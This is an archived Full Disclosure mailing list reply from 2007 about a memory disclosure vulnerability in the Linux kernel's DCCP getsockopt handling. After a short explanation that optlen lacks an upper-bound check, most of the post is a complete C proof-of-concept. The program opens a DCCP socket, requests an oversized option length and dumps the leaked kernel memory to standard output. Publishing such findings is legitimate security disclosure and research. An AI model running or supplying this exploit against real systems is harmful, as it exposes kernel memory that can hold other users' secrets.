Full Disclosure mailing list archives
Re: Linux Kernel DCCP Memory Disclosure Vulnerability
From: Robert Święcki <jagger () swiecki net>
Date: Tue, 27 Mar 2007 22:33:14 +0200
... if (get_user(len, optlen)) return -EFAULT; if (len < sizeof(int)) return -EINVAL;
Actually, `optlen' is not checked againist upper limit as well, so we can simply use any large positive value for getsockopt()'s optlen and we will be able to use it on IA32 cpus as well, without playing with signedness. I must be blind :). POC: #include <netinet/in.h> #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <net/if.h> #include <sys/mman.h> #include <linux/net.h> #define BUFSIZE 0x10000000 int main(int argc, char *argv[]) { void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); if (mem == (void*)-1) { printf("Alloc failed\n"); return -1; } /* SOCK_DCCP, IPPROTO_DCCP */ int s = socket(PF_INET, 6, 33); if (s == -1) { fprintf(stderr, "socket failure!\n"); return 1; } /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ int len = BUFSIZE; int x = getsockopt(s, 269, 11, mem, &len); if (x == -1) perror("SETSOCKOPT"); else printf("SUCCESS\n"); write(1, mem, BUFSIZE); return 0; } -- Robert Swiecki - http://www.swiecki.net NEVER EVER mess with a PCB jumper you don't understand, even if it's labelled "SEX AND FREE BEER" (C)1992 Dave Haynie - Amiga developer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Linux Kernel DCCP Memory Disclosure Vulnerability Robert Święcki (Mar 27)
- Re: Linux Kernel DCCP Memory Disclosure Vulnerability Robert Święcki (Mar 27)